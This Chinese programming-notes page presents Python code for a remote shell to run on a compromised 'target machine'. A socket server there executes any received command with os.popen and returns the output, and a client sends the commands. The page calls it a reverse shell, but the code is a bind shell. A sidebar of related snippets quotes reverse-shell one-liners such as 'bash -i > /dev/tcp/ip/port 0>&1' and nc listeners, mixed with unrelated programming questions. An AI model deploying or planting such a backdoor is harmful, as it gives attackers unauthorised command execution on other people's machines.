当前位置: 首页 > 编程笔记 >

python模拟菜刀反弹shell绕过限制【推荐】

丰飞龙
2023-03-14
本文向大家介绍python模拟菜刀反弹shell绕过限制【推荐】,包括了python模拟菜刀反弹shell绕过限制【推荐】的使用技巧和注意事项,需要的朋友参考一下

有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell

主要用到python os库和sokect库

这里的服务端在目标机上运行

from socket import *
from os import *
s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议
s.bind(('',6666))#补丁端口
s.listen(1)#开始监听一个队列
while True:
  sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号
  print ('客户端:',addr)
  while True:
    cmd=sock.recv(1024)#缓存长度 接收传递过来
    cmdstr=cmd.decode()
    if cmdstr=='exit':
      print ('客户端:',addr,'关闭')
      sock.close()
      break
    result=popen(cmdstr).read()
    sock.send(result.encode())
s.close()

本机运行

from socket import *
from os import *

c=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议
c.connect(('127.0.0.1',6666))#连接地址
while True:
  cmd=input("cmd:")
  c.send(cmd.encode())#必须传递流
  if cmd=='exit':
    c.close()
    break
  data=c.recv(1014)
  print (data.decode())

总结

以上所述是小编给大家介绍的python模拟菜刀反弹shell绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留言,小编会及时回复大家的!

 类似资料:
  • 本文向大家介绍Linux下NC反弹shell命令(推荐),包括了Linux下NC反弹shell命令(推荐)的使用技巧和注意事项,需要的朋友参考一下 本机开启监听: 目标机器开启反弹 bash版本: perl版本: php版本: ruby版本: python版本: nc版本: java版本: lua版本: NC版本不使用-e参数: 以上所述是小编给大家介绍的Linux下NC反弹shell命令,希望对

  • 我有一个Quarkus项目,我将大部分业务逻辑放在服务中,也就是使用@ApplicationScoped注释的可注入bean中,所有CRUD操作都在其中进行。在JAX-RS资源文件本身中,大部分逻辑只是验证,通常使用整个验证bean。这意味着我们需要在测试资源时模拟注入的服务,以防止单元测试成为本质上的集成测试。我们这样做有这样一个结构(示例项目); 文件模拟欢迎服务。java又是这样的: 我们的

  • 问题内容: 我有一个浮点数的大数据集。我遍历它们并为它们中的每一个进行评估。我懂了 我想解决这个问题,如果发生此错误,则返回0。 我正在考虑定义一个新功能: 基本上,我需要一种测试输出是否正确的方法,但我不知道如何进行。感谢您的帮助! 问题答案: 由于for为负无穷大,因此我只需要检查输入值是否为零并返回您想要的值即可: 编辑 :小编辑:您应该检查所有小于或等于0的值。 编辑2 :当然是在nump

  • 本文向大家介绍linux反弹shell的原理详解,包括了linux反弹shell的原理详解的使用技巧和注意事项,需要的朋友参考一下 完整命令 反弹shell命令: 利用nc反弹shell: 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,

  • 问题内容: 我目前正在使用SQL Server Management Studio 17连接到Oracle数据库实例,然后提取一些数据并将其插入到我拥有的SQL Server表中。 我尝试执行以下操作: 但是,SQL代码大约为9500个字符,因此失败,这在MSDN文章中得到了支持。 我引用了这些网站: -MSDN一 -MSDN二 并了解到我可以用来实现自己的目标。我尝试实现以下内容: 但是,我仍然

  • 本文向大家介绍浅析Linux之bash反弹shell原理,包括了浅析Linux之bash反弹shell原理的使用技巧和注意事项,需要的朋友参考一下 环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 攻击机

  • 有人能告诉我原因或上面代码的更好替代方案吗?

  • 我有多个视图,其中有一个公共的@部分将显示在布局文件中。我必须限制@yield返回的字符数。 尽管示例非常简单,但每个og_title@section都有自己的后期处理(if…else…) 现在,我要做的是将substr添加到每个og_title@部分,并将其重复到所有视图。问题是,当字符限制更改(例如60到75)时,我还必须将其更改为每个视图。 有没有办法限制@yield返回的字符数?类似: 我